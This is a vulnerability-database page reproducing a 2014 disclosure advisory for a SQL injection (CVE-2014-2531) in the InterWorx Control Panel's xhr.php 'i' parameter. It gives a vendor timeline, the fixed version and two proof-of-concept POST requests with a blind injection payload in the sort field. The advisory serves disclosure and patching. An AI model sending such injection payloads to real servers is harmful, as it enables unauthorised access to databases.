Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 29 Views

SQL injection in InterWorx Control Panel v5.0.13 build 574 (xhr.php, i param

Related
Code
ReporterTitlePublishedViews
Family
0day.today		InterWorx 5.0.13 Build 574 SQL Injection Vulnerability
26 Mar 201400:00
zdt
Circl		CVE-2014-2531
26 Mar 201400:00
circl
CVE		CVE-2014-2531
21 Oct 201416:00
cve
Cvelist		CVE-2014-2531
21 Oct 201416:00
cvelist
Exploit DB		InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection
26 Mar 201400:00
exploitdb
EUVD		EUVD-2014-2567
7 Oct 202500:30
euvd
exploitpack		InterWorx Control Panel 5.0.13 build 574 - xhr.php?i SQL Injection
26 Mar 201400:00
exploitpack
NVD		CVE-2014-2531
21 Oct 201416:55
nvd
Packet Storm		InterWorx 5.0.13 Build 574 SQL Injection
25 Mar 201400:00
packetstorm
Prion		Sql injection
21 Oct 201416:55
prion
Rows per page

                                                =================================================
Title: SQL injection in InterWorx Control Panel
Product: InterWorx Web Control Panel
Vendor: InterWorx LLC
Tested Version: 5.0.13 build 574
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-2531
Solution Status: Fixed in Version 5.0.14 build 577
Discovered and Provided: Eric Flokstra
=================================================

About the Vendor:
-------------------------
The InterWorx Hosting Control Panel is a web hosting and linux server
management system that provides tools for server administrators to
command their servers and for end users to oversee the operations of
their website.

Advisory Details:
-----------------------
SQL injection vulnerability in the InterWorx Web Control Panel.

The InterWorx application stores its data in a MySQL-database. For
interaction with the database dynamic queries are used. These queries
are created by concatenating strings from the application with user
input. However, the application does not perform proper validation or
escaping of the supplied input in the 'i' parameter when sorting user
accounts in NodeWorx, Siteworx and Resellers. Malicious users with
access to this functionality can manipulate database queries to
achieve other goals than the developers had in mind.

The following requests can be used as proof of concept and demonstrate
that user input is concatenated into a database query without proper
validation or escaping. The payload in the first request checks
whether the letter 'm' is the first letter of the database version.
Since the database in use is MySQL this condition is true and the
table is sorted by column 'nu.email'. If the condition is false
(request 2/letter t) the table is sorted by column 'nu.nickname'.

Request 1:
---------------
POST /xhr.php HTTP/1.1
Host: some.host.com:1234
".."

i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='m')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}}

Request 2:
---------------
POST /xhr.php HTTP/1.1
Host: some.host.com:1234
".."

i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='t')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}}

Vendor contact timeline:
---------------------------------
21 Feb 2014: Vendor notification
21 Feb 2014: Vulnerability confirmation
17 Mar 2014: Issue patched
25 Mar 2014: Public disclosure

Solution:
------------
Upgrade to the latest version (5.0.14 build 577) of InterWorx Web Control Panel.

References:
-----------------
[1] InterWorx Beta Channel -
http://forums.interworx.com/threads/8000-InterWorx-Version-5-0-14-Released-on-Beta-Channel!
[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.01692
interworx control panelsql injectioncve-2014-2531mysql-databasevendorvulnerabilitypatchedversion 5.0.14build 577
29